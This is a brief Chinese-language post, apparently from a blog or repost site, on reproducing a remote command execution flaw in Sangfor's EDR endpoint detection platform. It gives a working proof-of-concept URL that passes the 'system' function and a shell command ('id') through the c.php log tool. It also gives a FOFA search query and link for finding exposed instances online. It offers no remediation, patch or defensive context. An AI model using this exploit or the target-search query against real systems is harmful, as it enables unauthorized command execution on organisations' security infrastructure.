深信服EDR(终端检测响应平台)远程命令执行

深信服edr远程命令执行复现

1、POC

http:xxxxxx/tool/log/c.php?strip_slashes=system&host=id

 

2、FOFA语法

语法 title="终端检测响应平台"

https://fofa.so/result?q=%E7%BB%88%E7%AB%AF%E6%A3%80%E6%B5%8B%E5%93%8D%E5%BA%94%E5%B9%B3%E5%8F%B0

深信服EDR(终端检测响应平台)远程命令执行_第1张图片

 

3、案例复现

漏洞页面:

 

深信服EDR(终端检测响应平台)远程命令执行_第2张图片

 

 

 

你可能感兴趣的:(Web渗透测试)